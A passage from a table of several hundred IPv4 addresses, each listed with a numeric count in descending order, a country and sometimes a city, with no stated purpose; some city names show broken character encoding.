| 198.24.164.178 | 480 | US | United States | Tempe |
| 67.23.47.245 | 480 | US | United States | San Antonio |
| 77.222.40.155 | 480 | RU | Russian Federation | |
| 208.76.80.113 | 480 | US | United States | Troy |
| 207.58.176.132 | 480 | US | United States | Mclean |
| 144.76.68.77 | 480 | DE | Germany | |
| 75.127.110.48 | 480 | US | United States | Atlanta |
| 50.22.86.10 | 480 | US | United States | Dallas |
| 91.230.211.138 | 480 | RU | Russian Federation | |
| 149.154.157.35 | 480 | IT | Italy | Milano |
| 188.138.112.229 | 480 | DE | Germany | |
| 216.246.0.119 | 480 | US | United States | Chicago |
| 91.228.197.83 | 480 | PL | Poland | |
| 70.38.98.232 | 480 | CA | Canada | Montr�al |
| 178.238.232.86 | 480 | DE | Germany | |
| 68.90.69.177 | 480 | US | United States | Saint Peters |
| 173.193.244.28 | 468 | US | United States | Dallas |
| 141.72.197.122 | 468 | DE | Germany | Stuttgart |
| 173.10.247.83 | 468 | US | United States | Albuquerque |
| 78.46.229.103 | 468 | DE | Germany | |
| 37.59.13.98 | 468 | FR | France | |
| 198.143.156.194 | 468 | US | United States | Chicago |
| 134.255.230.21 | 468 | DE | Germany | |
| 195.14.104.38 | 468 | RU | Russian Federation | |
| 209.212.240.116 | 468 | US | United States | Cincinnati |
| 188.120.237.187 | 468 | RU | Russian Federation | Moscow |
| 176.98.48.37 | 468 | UA | Ukraine | |
| 173.254.246.5 | 468 | US | United States | Los Angeles |
| 37.140.192.58 | 468 | RU | Russian Federation | |
| 199.116.255.171 | 468 | US | United States | Schertz |
| 74.50.112.162 | 468 | US | United States | Tampa |
| 89.185.250.84 | 456 | CZ | Czech Republic | |
| 149.154.64.105 | 456 | RU | Russian Federation | |
| 76.76.107.122 | 456 | CA | Canada | Montr�al |
| 74.208.144.39 | 456 | US | United States | Wayne |
| 162.40.4.56 | 456 | US | United States | Glenwood |
| 193.107.88.60 | 456 | PL | Poland | |
| 91.234.146.224 | 456 | PL | Poland | |
| 209.61.173.134 | 456 | US | United States | San Antonio |
| 49.212.141.75 | 456 | JP | Japan | Osaka |
| 79.140.78.106 | 456 | RU | Russian Federation | |
| 178.17.41.215 | 456 | GB | United Kingdom | |
| 192.155.85.147 | 456 | US | United States | Absecon |
| 162.243.19.158 | 456 | US | United States | |
| 66.186.176.231 | 456 | US | United States | Bangor |
| 37.205.32.122 | 456 | IS | Iceland | Selfoss |
| 148.251.41.175 | 444 | DE | Germany | |
| 62.112.194.8 | 444 | HU | Hungary | |
| 85.214.97.202 | 444 | DE | Germany | Berlin |
| 216.187.66.17 | 444 | US | United States | New York |
| 178.32.136.17 | 444 | IT | Italy | |
| 64.202.249.5 | 444 | US | United States | Eden Prairie |
| 85.13.136.190 | 444 | DE | Germany | |
| 144.76.209.46 | 444 | DE | Germany | |
| 178.63.13.86 | 444 | DE | Germany | |
| 207.7.84.87 | 444 | US | United States | Dallas |
| 178.77.97.161 | 444 | DE | Germany | H�st |
| 38.102.33.28 | 444 | US | United States | |
| 109.109.232.226 | 432 | GB | United Kingdom | |
| 109.68.38.23 | 432 | GB | United Kingdom | |
| 188.126.73.68 | 432 | SE | Sweden | |
| 37.59.4.200 | 432 | FR | France | |
| 77.222.56.219 | 432 | RU | Russian Federation | |
| 92.53.106.13 | 432 | RU | Russian Federation | |
| 85.236.39.38 | 432 | DE | Germany | |
| 85.214.218.136 | 432 | DE | Germany | Berlin |
| 46.4.65.154 | 432 | DE | Germany | |
| 87.98.238.195 | 432 | PL | Poland | |
| 62.76.6.54 | 432 | RU | Russian Federation | Sukhanova |
| 103.9.100.77 | 432 | SG | Singapore | |
| 37.59.8.100 | 432 | FR | France | |
| 5.77.48.199 | 432 | GB | United Kingdom | |
| 188.65.117.67 | 432 | GB | United Kingdom | |
| 198.23.98.132 | 432 | US | United States | Dallas |
| 177.73.233.247 | 432 | BR | Brazil | |
| 5.9.136.6 | 432 | DE | Germany | |
| 5.9.150.228 | 420 | DE | Germany | |
| 142.4.11.47 | 420 | US | United States | Provo |
| 113.28.167.81 | 420 | HK | Hong Kong | |
| 103.11.100.16 | 420 | HK | Hong Kong | |
| 5.187.1.59 | 420 | DE | Germany | Frankfurt |
| 27.254.36.227 | 420 | TH | Thailand | |
| 69.50.197.238 | 420 | US | United States | Phoenix |
| 77.222.40.176 | 420 | RU | Russian Federation | |
| 77.222.61.193 | 420 | RU | Russian Federation | |
| 69.176.116.145 | 420 | US | United States | Vancleave |
| 49.50.8.21 | 420 | ID | Indonesia | |
| 103.9.100.130 | 420 | SG | Singapore | |
| 199.231.228.34 | 420 | US | United States | Huntsville |
| 195.200.78.84 | 420 | FR | France | |
| 80.79.243.29 | 420 | RU | Russian Federation | |
| 203.211.143.71 | 408 | SG | Singapore | |
| 65.99.237.21 | 408 | US | United States | Saint Louis |
| 89.31.72.177 | 408 | IT | Italy | |
| 208.113.153.219 | 408 | US | United States | Brea |
| 50.23.40.50 | 408 | US | United States | Dallas |
| 209.200.247.119 | 408 | US | United States | Anaheim |
| 208.76.83.22 | 408 | US | United States | Troy |
| 184.173.248.206 | 408 | US | United States | Houston |
| 198.57.194.245 | 408 | US | United States | Provo |
| 89.200.171.219 | 408 | DE | Germany | |
| 79.172.211.73 | 408 | HU | Hungary | |
| 65.183.81.70 | 408 | US | United States | Allenspark |
| 50.17.217.186 | 408 | US | United States | Ashburn |
| 66.240.213.72 | 396 | US | United States | San Diego |
| 77.222.42.108 | 396 | RU | Russian Federation | |
| 63.247.138.155 | 396 | US | United States | Jacksonville |
| 74.208.65.64 | 396 | US | United States | Wayne |
| 185.20.226.88 | 396 | RU | Russian Federation | |
| 201.49.58.240 | 396 | BR | Brazil | Fortaleza |
| 78.140.173.31 | 396 | NL | Netherlands | |
| 46.4.29.81 | 396 | DE | Germany | |
| 50.87.45.80 | 396 | US | United States | Provo |
| 213.81.223.204 | 396 | SK | Slovakia | |
| 210.211.117.203 | 396 | VN | Vietnam | Hanoi |
| 212.178.98.97 | 396 | NL | Netherlands | 's-hertogenbosch |
| 151.236.44.203 | 396 | GB | United Kingdom | |
| 178.77.80.158 | 384 | DE | Germany | H�st |
| 109.73.173.176 | 384 | IN | India | New Delhi |
| 88.80.210.136 | 384 | DE | Germany | H�st |
| 77.222.40.96 | 384 | RU | Russian Federation | |
| 89.20.37.147 | 384 | RU | Russian Federation | |
| 188.138.103.170 | 384 | DE | Germany | |
| 192.196.158.93 | 384 | US | United States | West Chester |
| 68.115.58.114 | 384 | US | United States | Onalaska |
| 185.17.240.3 | 384 | FR | France | |
| 67.222.143.120 | 372 | US | United States | Dallas |
| 81.169.177.66 | 372 | DE | Germany | Berlin |
| 199.189.111.180 | 372 | US | United States | Providence |
| 88.208.204.131 | 372 | GB | United Kingdom | Gloucester |
| 77.222.40.66 | 372 | RU | Russian Federation | |
| 91.201.52.62 | 372 | RU | Russian Federation | |
| 78.56.78.115 | 372 | LT | Lithuania | Vilnius |
| 199.36.142.138 | 372 | US | United States | Plano |
| 91.207.158.161 | 372 | NO | Norway | |
| 94.127.69.239 | 372 | RU | Russian Federation | |
| 93.57.93.125 | 372 | IT | Italy | Reggio Nell'emilia |
| 176.28.15.41 | 372 | DE | Germany | H�st |
| 192.190.84.106 | 372 | US | United States | West Chester |
| 176.9.37.82 | 372 | DE | Germany | |
| 198.20.177.190 | 360 | US | United States | Buffalo |
| 91.225.136.223 | 360 | UA | Ukraine | |
| 77.222.56.165 | 360 | RU | Russian Federation | |
| 162.219.6.215 | 360 | US | United States | Orem |
| 185.4.74.145 | 360 | EE | Estonia | |
| 77.222.56.211 | 360 | RU | Russian Federation | |
| 77.221.136.250 | 360 | RU | Russian Federation | |
| 109.69.8.41 | 360 | ES | Spain | Barcelona |
| 108.160.148.150 | 360 | US | United States | Piscataway |
| 5.79.24.70 | 360 | GB | United Kingdom | |
| 41.76.118.147 | 360 | ZA | South Africa | |
| 94.76.244.229 | 360 | GB | United Kingdom | |
| 67.20.55.144 | 360 | US | United States | Novi |
| 216.120.237.240 | 360 | US | United States | Clifton Park |
| 185.19.184.132 | 360 | IT | Italy | |
| 88.198.62.50 | 360 | DE | Germany | N�rnberg |
| 213.161.179.4 | 360 | NO | Norway | |
| 173.203.70.239 | 360 | US | United States | San Antonio |
| 77.120.108.132 | 360 | UA | Ukraine | Kiev |
| 198.61.217.176 | 360 | US | United States | San Antonio |
| 62.140.253.3 | 360 | RU | Russian Federation | |
| 77.221.130.53 | 360 | RU | Russian Federation | |
| 64.111.126.33 | 360 | US | United States | Brea |
| 112.213.88.159 | 348 | VN | Vietnam | Nguy�n |
| 77.222.61.240 | 348 | RU | Russian Federation | |
| 77.222.56.10 | 348 | RU | Russian Federation | |
| 27.111.40.218 | 348 | ID | Indonesia | |
| 199.189.248.130 | 348 | US | United States | New York |
| 217.78.0.123 | 348 | IE | Ireland | |
| 54.200.212.241 | 348 | US | United States | Boardman |
| 93.186.241.17 | 348 | IT | Italy | |
| 192.145.239.10 | 348 | US | United States | Los Angeles |
| 85.214.84.237 | 348 | DE | Germany | Berlin |
| 77.222.61.167 | 348 | RU | Russian Federation | |
| 86.107.43.52 | 348 | RO | Romania | |
| 99.198.99.58 | 348 | US | United States | Chicago |
| 195.88.7.11 | 348 | IT | Italy | Case |
| 178.21.73.112 | 348 | SE | Sweden | |
| 77.222.40.125 | 348 | RU | Russian Federation | |
| 70.32.74.121 | 348 | US | United States | Culver City |
| 82.165.156.128 | 348 | DE | Germany | |
| 168.63.66.108 | 348 | US | United States | |
| 188.225.35.191 | 348 | RU | Russian Federation | |
| 162.144.91.135 | 336 | US | United States | Provo |
| 85.13.139.30 | 336 | DE | Germany | |
| 222.122.197.61 | 336 | KR | Korea, Republic of | |
| 87.106.138.48 | 336 | DE | Germany | |
| 77.221.130.11 | 336 | RU | Russian Federation | |
| 198.46.81.6 | 336 | US | United States | Los Angeles |
| 46.165.242.3 | 336 | DE | Germany | |
| 65.254.62.103 | 336 | US | United States | Atlanta |
| 188.130.241.26 | 336 | RU | Russian Federation | Pskov |
| 5.79.65.210 | 336 | NL | Netherlands | Amsterdam |
| 49.50.8.42 | 336 | ID | Indonesia | |
| 50.57.171.172 | 336 | US | United States | San Antonio |
| 216.194.164.114 | 336 | US | United States | Los Angeles |
| 198.211.120.91 | 336 | US | United States | New York |
| 67.222.24.198 | 336 | US | United States | Dallas |
| 130.185.81.10 | 336 | PT | Portugal | |
| 64.119.182.22 | 336 | US | United States | Englewood |
| 89.184.76.137 | 336 | UA | Ukraine | Kiev |
| 27.254.81.20 | 336 | TH | Thailand | |
| 85.214.234.201 | 336 | DE | Germany | Berlin |
| 208.111.166.38 | 336 | US | United States | Tempe |
| 77.89.7.180 | 336 | IT | Italy | Faenza |
| 88.190.35.53 | 336 | FR | France | Paris |
| 69.64.88.232 | 336 | US | United States | Overland Park |
| 141.8.195.92 | 336 | RU | Russian Federation | |
| 74.220.207.177 | 336 | US | United States | Provo |
| 82.94.235.102 | 336 | NL | Netherlands | |
| 96.30.11.224 | 336 | US | United States | Chicago |
| 54.85.40.172 | 336 | US | United States | Ashburn |
| 62.244.56.5 | 324 | UA | Ukraine | |
| 91.201.52.114 | 324 | RU | Russian Federation | |
| 5.9.144.163 | 324 | DE | Germany | |
| 81.19.186.130 | 324 | GB | United Kingdom | |
| 69.175.44.34 | 324 | US | United States | Chicago |
| 77.222.61.13 | 324 | RU | Russian Federation | |
| 88.198.224.107 | 324 | DE | Germany | |
| 162.144.81.227 | 324 | US | United States | Provo |
| 193.17.184.48 | 324 | PL | Poland | |
| 198.101.226.193 | 324 | US | United States | San Antonio |
| 5.9.13.108 | 324 | DE | Germany | |
| 107.21.249.76 | 324 | US | United States | Ashburn |
| 50.112.253.249 | 324 | US | United States | Boardman |
| 75.126.65.39 | 324 | US | United States | Dallas |
| 95.215.226.222 | 324 | GB | United Kingdom | |
| 216.245.201.84 | 324 | US | United States | Dallas |
| 46.16.169.5 | 324 | IT | Italy | |
| 195.13.228.124 | 324 | LV | Latvia | Riga |
| 81.176.226.170 | 324 | RU | Russian Federation | |
| 198.1.126.90 | 324 | US | United States | Provo |
| 187.53.223.108 | 324 | BR | Brazil | |
| 75.147.255.122 | 324 | US | United States | Milford |
| 142.54.185.202 | 324 | US | United States | Kansas City |
| 54.235.53.185 | 324 | US | United States | Ashburn |
| 91.196.170.203 | 324 | NL | Netherlands | |
| 216.55.181.132 | 324 | US | United States | Overland Park |
| 77.221.130.21 | 324 | RU | Russian Federation | |
| 88.198.36.103 | 324 | DE | Germany | N�rnberg |
| 178.79.170.193 | 312 | GB | United Kingdom | |
| 208.76.86.35 | 312 | US | United States | Troy |
| 188.92.240.34 | 312 | RU | Russian Federation | |
| 198.154.111.122 | 312 | US | United States | Dallas |
| 198.27.81.115 | 312 | CA | Canada | Montr�al |
| 64.251.188.69 | 312 | US | United States | Wall |
| 222.97.189.45 | 312 | KR | Korea, Republic of | |
| 200.251.53.139 | 312 | BR | Brazil | |
| 188.127.239.136 | 312 | RU | Russian Federation | |
| 77.222.40.115 | 312 | RU | Russian Federation | |
| 176.28.55.122 | 312 | DE | Germany | H�st |
| 80.91.89.227 | 312 | ES | Spain | |
| 208.113.129.14 | 312 | US | United States | Brea |
| 119.59.105.157 | 312 | TH | Thailand | |
| 213.136.65.234 | 312 | DE | Germany | |
| 91.228.236.4 | 312 | UA | Ukraine | |
| 144.76.112.179 | 312 | DE | Germany | |
| 106.186.112.193 | 312 | JP | Japan | |
| 74.220.219.68 | 312 | US | United States | Provo |
| 89.184.67.225 | 312 | UA | Ukraine | Kiev |
| 67.205.47.214 | 312 | US | United States | Brea |
| 166.78.144.154 | 312 | US | United States | San Antonio |
| 162.253.145.150 | 312 | US | United States | |
| 212.97.160.75 | 312 | ES | Spain | Zaragoza |
| 77.120.105.130 | 312 | UA | Ukraine | |
| 103.23.79.134 | 312 | SG | Singapore | |
| 77.222.40.81 | 312 | RU | Russian Federation | |
| 74.50.87.130 | 312 | US | United States | Union City |
| 107.21.114.99 | 312 | US | United States | Ashburn |
| 148.251.41.70 | 312 | DE | Germany | |
| 86.107.43.53 | 312 | RO | Romania | |
| 218.213.244.117 | 312 | HK | Hong Kong | Kwai Chung |
| 82.98.162.44 | 312 | ES | Spain | |
| 90.150.149.3 | 312 | RU | Russian Federation | |
| 62.77.65.123 | 312 | CZ | Czech Republic | |
| 222.124.202.178 | 312 | ID | Indonesia | Jakarta |
| 91.201.52.87 | 312 | RU | Russian Federation | |
| 77.222.40.53 | 312 | RU | Russian Federation | |
| 194.186.22.174 | 300 | RU | Russian Federation | |
| 83.169.19.196 | 300 | DE | Germany | H�st |
| 87.247.179.190 | 300 | IR | Iran, Islamic Republic of | |
| 157.7.184.16 | 300 | JP | Japan | |
| 62.75.216.86 | 300 | DE | Germany | |
| 64.111.127.191 | 300 | US | United States | Brea |
| 54.199.128.26 | 300 | JP | Japan | Tokyo |
| 212.83.148.67 | 300 | FR | France | |
| 109.72.95.12 | 300 | NL | Netherlands | |
| 54.236.216.241 | 300 | US | United States | Ashburn |
| 46.4.61.212 | 300 | DE | Germany | |
| 118.69.204.202 | 300 | VN | Vietnam | |
| 92.255.196.173 | 300 | RU | Russian Federation | Kazan |
| 23.89.192.224 | 300 | US | United States | Henderson |
| 27.254.66.151 | 300 | TH | Thailand | |
| 85.13.150.116 | 300 | DE | Germany | |
| 81.201.49.9 | 300 | CZ | Czech Republic | Kladno |
| 173.254.28.57 | 300 | US | United States | Provo |
| 144.76.154.81 | 300 | DE | Germany | |
| 66.115.174.137 | 300 | US | United States | Marietta |
| 212.15.115.19 | 300 | RU | Russian Federation | Moscow |
| 89.184.70.31 | 300 | UA | Ukraine | Kiev |
| 85.25.201.176 | 300 | DE | Germany | |
| 120.138.21.77 | 300 | NZ | New Zealand | |
| 98.142.240.110 | 300 | CA | Canada | Brampton |
| 184.107.154.82 | 300 | CA | Canada | Montr�al |
| 159.253.144.76 | 300 | NL | Netherlands | |
| 109.202.13.114 | 288 | RU | Russian Federation | Tomsk |
| 178.172.148.221 | 288 | BY | Belarus | |
| 164.177.151.209 | 288 | GB | United Kingdom | |
| 198.154.248.248 | 288 | US | United States | Houston |
| 75.125.253.18 | 288 | US | United States | Houston |
| 190.153.188.6 | 288 | CL | Chile | Santiago |
| 78.47.94.128 | 288 | DE | Germany | |
| 54.250.184.233 | 288 | JP | Japan | Tokyo |
| 183.81.164.218 | 288 | MY | Malaysia | |
| 176.9.218.111 | 288 | DE | Germany | |
| 194.27.32.44 | 288 | TR | Turkey | Mugla |
| 185.4.75.69 | 288 | EE | Estonia | |
| 91.212.157.65 | 288 | FR | France | |
| 217.20.175.14 | 288 | UA | Ukraine | |
| 64.90.57.231 | 288 | US | United States | Brea |
| 148.251.0.23 | 288 | DE | Germany | |
| 50.56.69.73 | 288 | US | United States | San Antonio |
| 188.165.229.9 | 288 | FR | France | |
| 46.252.16.11 | 288 | DE | Germany | |
| 178.63.68.203 | 288 | DE | Germany | |
| 82.98.139.8 | 288 | ES | Spain | |
| 212.67.217.28 | 288 | GB | United Kingdom | |
| 87.118.90.207 | 288 | DE | Germany | |
| 91.239.66.97 | 288 | PL | Poland | |
| 78.46.220.108 | 288 | DE | Germany | |
| 85.13.138.19 | 288 | DE | Germany | |
| 195.62.70.239 | 288 | RU | Russian Federation | |
| 95.163.69.102 | 288 | RU | Russian Federation | |
| 129.121.177.180 | 288 | US | United States | Albuquerque |
| 69.28.254.181 | 288 | CA | Canada | Montr�al |
| 208.113.225.11 | 288 | US | United States | Brea |
| 202.181.172.147 | 288 | HK | Hong Kong | |
| 103.1.186.252 | 288 | AU | Australia | Marrickville |
| 81.176.232.174 | 287 | RU | Russian Federation | |
| 80.247.79.182 | 276 | IT | Italy | |
| 83.216.181.139 | 276 | IT | Italy | Fiorano Modenese |
| 212.191.32.222 | 276 | PL | Poland | Lodz |
| 194.190.67.126 | 276 | RU | Russian Federation | |
| 77.222.40.205 | 276 | RU | Russian Federation | |
| 77.222.56.208 | 276 | RU | Russian Federation | |
| 198.154.218.101 | 276 | US | United States | Houston |
| 23.253.211.174 | 276 | US | United States | San Antonio |
| 198.15.95.74 | 276 | US | United States | Tempe |
| 82.98.169.87 | 276 | ES | Spain | |
| 199.89.53.36 | 276 | US | United States | |
| 89.184.69.2 | 276 | UA | Ukraine | Kiev |
| 133.242.205.125 | 276 | JP | Japan | Sakura |
| 213.238.166.30 | 276 | TR | Turkey | |
| 5.187.1.232 | 276 | DE | Germany | Frankfurt |
| 108.171.175.23 | 276 | US | United States | San Antonio |
| 203.176.183.45 | 276 | ID | Indonesia | Bogor |
| 212.224.118.220 | 276 | DE | Germany | |
| 176.67.240.92 | 276 | RU | Russian Federation | Nizhniy Novgorod |
| 65.99.237.20 | 276 | US | United States | Saint Louis |
| 178.63.22.196 | 276 | DE | Germany | |
| 77.222.61.185 | 276 | RU | Russian Federation | |
| 95.213.136.66 | 276 | RU | Russian Federation | |
| 49.50.8.226 | 276 | ID | Indonesia | |
| 64.90.42.228 | 276 | US | United States | Brea |
| 195.204.17.84 | 276 | NO | Norway | �s |
| 162.213.254.82 | 276 | US | United States | Los Angeles |
| 62.75.142.113 | 276 | DE | Germany | |
| 173.203.81.168 | 276 | US | United States | San Antonio |
| 106.187.93.112 | 276 | JP | Japan | |
| 195.225.168.238 | 276 | IT | Italy | |
| 173.214.187.101 | 276 | US | United States | Edmond |
| 70.32.78.142 | 276 | US | United States | Culver City |
| 46.119.10.42 | 276 | UA | Ukraine | |
| 129.121.176.183 | 264 | US | United States | Albuquerque |
| 74.220.207.175 | 264 | US | United States | Provo |
| 184.107.198.106 | 264 | CA | Canada | Montr�al |
| 106.51.252.22 | 264 | IN | India | |
| 117.53.153.171 | 264 | MY | Malaysia | |
| 108.168.130.34 | 264 | US | United States | Dallas |
| 77.222.40.26 | 264 | RU | Russian Federation | |
| 77.221.130.46 | 264 | RU | Russian Federation | |
| 87.106.18.135 | 264 | DE | Germany | |
| 88.80.213.62 | 264 | DE | Germany | H�st |
| 68.171.222.84 | 264 | US | United States | Southfield |
| 81.176.226.164 | 264 | RU | Russian Federation | |
| 65.99.237.17 | 264 | US | United States | Saint Louis |
| 69.195.198.156 | 264 | US | United States | Miami |
| 216.194.8.46 | 264 | US | United States | Harrison |
| 67.205.20.94 | 264 | US | United States | Brea |
| 77.232.72.80 | 264 | EU | Europe | |
| 208.113.229.16 | 264 | US | United States | Brea |
| 193.239.4.84 | 264 | DE | Germany | |
| 174.140.212.122 | 264 | US | United States | Las Vegas |
| 77.222.61.113 | 264 | RU | Russian Federation | |
| 77.92.143.166 | 264 | TR | Turkey | Sanayi |
| 91.199.197.222 | 264 | RU | Russian Federation | |
| 89.31.103.105 | 264 | NL | Netherlands | |
| 77.120.106.25 | 264 | UA | Ukraine | |
| 5.178.85.12 | 264 | RU | Russian Federation | |
| 83.169.19.228 | 264 | DE | Germany | H�st |
| 199.116.78.158 | 264 | US | United States | Traverse City |
| 91.218.230.119 | 252 | RU | Russian Federation | |
| 50.57.86.110 | 252 | US | United States | San Antonio |
| 212.72.171.211 | 252 | DE | Germany | |
| 92.61.157.40 | 252 | EU | Europe | |
| 37.59.3.134 | 252 | FR | France | |
| 88.198.40.196 | 252 | DE | Germany | N�rnberg |
| 74.50.2.123 | 252 | US | United States | Anaheim |
| 163.178.101.196 | 252 | CR | Costa Rica | San Jos� |
| 77.222.40.65 | 252 | RU | Russian Federation | |
| 184.173.107.12 | 252 | US | United States | Houston |
| 81.169.131.15 | 252 | DE | Germany | Berlin |
| 69.175.78.58 | 252 | US | United States | Chicago |
| 77.222.40.221 | 252 | RU | Russian Federation | |
| 148.251.55.181 | 252 | DE | Germany | |
| 62.75.230.62 | 252 | DE | Germany | |
| 5.250.177.86 | 252 | GB | United Kingdom | |
| 77.221.130.38 | 252 | RU | Russian Federation | |
| 142.4.29.17 | 252 | US | United States | Provo |
| 199.116.78.108 | 252 | US | United States | Traverse City |
| 178.208.131.106 | 252 | RU | Russian Federation | |
| 95.169.186.78 | 252 | DE | Germany | |
| 77.222.57.40 | 240 | RU | Russian Federation | |
| 8.29.131.195 | 240 | US | United States | Cincinnati |
| 95.168.210.61 | 240 | CZ | Czech Republic | |
| 188.165.250.82 | 240 | FR | France | |
| 188.120.241.11 | 240 | RU | Russian Federation | Moscow |
| 5.9.122.105 | 240 | DE | Germany | |
| 192.237.186.143 | 240 | US | United States | San Antonio |
| 46.183.250.13 | 240 | NL | Netherlands | |
| 77.222.40.44 | 240 | RU | Russian Federation | |
| 77.221.130.31 | 240 | RU | Russian Federation | |
| 5.9.147.234 | 240 | DE | Germany | |
| 82.146.37.81 | 240 | RU | Russian Federation | Irkutsk |
| 95.138.189.116 | 240 | GB | United Kingdom | |
| 89.184.72.80 | 240 | UA | Ukraine | Kiev |
| 173.0.129.96 | 240 | US | United States | Orlando |
| 98.129.239.249 | 228 | US | United States | San Antonio |
| 174.136.12.69 | 228 | US | United States | Durham |
| 85.214.149.196 | 228 | DE | Germany | Berlin |
| 88.208.250.12 | 228 | GB | United Kingdom | Gloucester |
| 5.9.150.76 | 228 | DE | Germany | |
| 200.124.138.52 | 228 | CW | Curcao | Willemstad |
| 82.98.144.22 | 228 | ES | Spain | |
| 192.99.16.165 | 228 | CA | Canada | Montr�al |
| 88.204.108.93 | 228 | RU | Russian Federation | Tomsk |
| 62.99.220.220 | 228 | AT | Austria | |
| 203.123.187.186 | 228 | IN | India | |
| 91.201.52.83 | 228 | RU | Russian Federation | |
| 153.122.9.192 | 228 | JP | Japan | Tokyo |
| 77.87.193.193 | 228 | UA | Ukraine | |
| 199.231.93.131 | 228 | US | United States | Nanuet |
| 212.102.229.234 | 228 | DE | Germany | Oberberg |
| 193.106.95.104 | 228 | RU | Russian Federation | Moscow |
| 92.61.152.95 | 228 | EU | Europe | |
| 178.218.166.171 | 228 | HR | Croatia | |
| 217.243.238.50 | 228 | DE | Germany | |
| 188.225.36.197 | 228 | RU | Russian Federation | |
| 83.169.31.225 | 228 | DE | Germany | H�st |
| 144.76.200.117 | 228 | DE | Germany | |
| 176.58.122.8 | 216 | GB | United Kingdom | |
| 195.149.225.171 | 216 | PL | Poland | |
| 31.31.196.47 | 216 | RU | Russian Federation | |
| 79.96.190.30 | 216 | PL | Poland | |
| 208.113.153.234 | 216 | US | United States | Brea |
| 5.79.29.126 | 216 | GB | United Kingdom | |
| 103.11.74.136 | 216 | ID | Indonesia | |
| 198.100.45.29 | 216 | US | United States | |
| 37.9.169.12 | 204 | SK | Slovakia | |
| 82.207.52.82 | 204 | UA | Ukraine | |
| 5.63.159.22 | 204 | RU | Russian Federation | |
| 46.28.64.150 | 204 | UA | Ukraine | |
| 199.116.78.161 | 204 | US | United States | Traverse City |
| 195.210.46.110 | 204 | KZ | Kazakhstan | |
| 81.19.186.159 | 204 | GB | United Kingdom | |
| 64.55.119.44 | 204 | US | United States | Rancho Cordova |
| 23.252.121.207 | 204 | US | United States | Los Angeles |
| 69.41.236.53 | 204 | US | United States | Houston |
| 50.23.81.82 | 204 | US | United States | San Jose |
| 46.165.220.147 | 204 | DE | Germany | |
| 77.221.130.17 | 204 | RU | Russian Federation | |
| 37.59.10.29 | 192 | FR | France | |
| 193.17.204.52 | 192 | DE | Germany | |
| 216.120.250.101 | 192 | US | United States | Clifton Park |
| 162.209.99.196 | 192 | US | United States | San Antonio |
| 77.91.205.166 | 192 | PT | Portugal | |
| 81.25.126.23 | 192 | ES | Spain | |
| 207.58.145.53 | 192 | US | United States | Mclean |
| 112.78.2.175 | 192 | VN | Vietnam | |
| 207.228.63.37 | 192 | US | United States | Reno |
| 195.158.234.59 | 192 | RO | Romania | |
| 103.244.9.7 | 192 | SG | Singapore | |
| 85.214.144.114 | 192 | DE | Germany | Berlin |
| 81.29.203.238 | 192 | IT | Italy | |
| 87.106.135.33 | 192 | DE | Germany | |
| 85.13.143.160 | 180 | DE | Germany | |
| 162.243.40.27 | 180 | US | United States | |
| 82.98.134.212 | 180 | ES | Spain | |
| 66.225.219.33 | 180 | US | United States | Chicago |
| 46.33.115.219 | 180 | CZ | Czech Republic | |
| 66.199.140.243 | 180 | CA | Canada | Toronto |
| 112.78.6.239 | 180 | VN | Vietnam | |
| 213.168.182.122 | 180 | CZ | Czech Republic | Mlada Boleslav |
| 91.142.208.62 | 168 | ES | Spain | Barcelona |
| 68.171.219.98 | 168 | US | United States | Southfield |
| 69.163.180.47 | 168 | US | United States | Brea |
| 176.9.33.44 | 168 | DE | Germany | |
| 5.9.107.11 | 168 | DE | Germany | |
| 95.76.161.151 | 168 | RO | Romania | Bucharest |
| 81.177.3.76 | 168 | RU | Russian Federation | |
| 77.232.68.46 | 168 | EU | Europe | |
| 37.140.192.17 | 168 | RU | Russian Federation | |
| 198.154.104.66 | 168 | US | United States | Dallas |
| 85.13.130.230 | 168 | DE | Germany | |
| 49.50.8.193 | 156 | ID | Indonesia | |
| 5.9.141.74 | 156 | DE | Germany | |
| 70.85.33.34 | 156 | US | United States | Houston |
| 46.4.90.51 | 156 | DE | Germany | |
| 151.78.206.227 | 156 | IT | Italy | |
| 77.222.56.22 | 156 | RU | Russian Federation | |
| 37.140.192.60 | 144 | RU | Russian Federation | |
| 210.211.101.21 | 144 | VN | Vietnam | Hanoi |
| 88.198.158.190 | 144 | DE | Germany | |
| 198.57.163.213 | 144 | US | United States | Provo |
| 103.249.108.101 | 144 | HK | Hong Kong | |
| 77.222.61.197 | 144 | RU | Russian Federation | |
| 85.214.240.160 | 144 | DE | Germany | Berlin |
| 174.136.14.109 | 132 | US | United States | Durham |
| 98.129.249.134 | 132 | US | United States | San Antonio |
| 108.168.250.16 | 132 | US | United States | Dallas |
| 64.34.157.180 | 132 | US | United States | New York |
| 217.160.168.95 | 132 | DE | Germany | |
| 144.76.131.196 | 132 | DE | Germany | |
| 213.162.246.73 | 132 | NO | Norway | |
| 162.144.36.171 | 132 | US | United States | Provo |
| 198.57.205.195 | 132 | US | United States | Provo |
| 208.113.185.93 | 132 | US | United States | Brea |
| 194.100.28.115 | 132 | FI | Finland | |
| 79.99.203.89 | 120 | BE | Belgium | |
| 82.98.134.217 | 120 | ES | Spain | |
| 134.0.113.79 | 120 | RU | Russian Federation | |
| 173.236.176.122 | 120 | US | United States | Brea |
| 92.53.126.190 | 120 | RU | Russian Federation | |
| 85.13.130.227 | 120 | DE | Germany | |
| 77.221.130.37 | 120 | RU | Russian Federation | |
| 64.202.107.85 | 120 | US | United States | Chicago |
| 212.34.156.23 | 120 | ES | Spain | |
| 184.173.107.20 | 108 | US | United States | Houston |
| 46.161.1.139 | 108 | RU | Russian Federation | Saint Petersburg |
| 64.5.33.166 | 108 | US | United States | Houston |
| 212.85.116.109 | 108 | PL | Poland | |
| 5.63.159.66 | 108 | RU | Russian Federation | |
| 89.184.78.99 | 108 | UA | Ukraine | Kiev |
| 85.25.78.183 | 108 | DE | Germany | |
| 148.251.47.43 | 108 | DE | Germany | |
| 92.53.126.118 | 96 | RU | Russian Federation | |
| 92.53.125.178 | 96 | RU | Russian Federation | |
| 92.53.112.202 | 96 | RU | Russian Federation | |
| 92.53.125.158 | 96 | RU | Russian Federation | |
| 75.126.27.90 | 96 | US | United States | Dallas |
| 77.222.40.185 | 96 | RU | Russian Federation | |
| 195.234.4.60 | 96 | UA | Ukraine | |
| 78.108.80.10 | 96 | RU | Russian Federation | |
| 79.96.54.190 | 96 | PL | Poland | |
| 77.75.35.140 | 96 | TR | Turkey | |
| 85.13.150.66 | 96 | DE | Germany | |
| 93.93.64.206 | 84 | ES | Spain | |
| 37.140.192.168 | 84 | RU | Russian Federation | |
| 92.53.126.164 | 84 | RU | Russian Federation | |
| 108.168.250.13 | 72 | US | United States | Dallas |
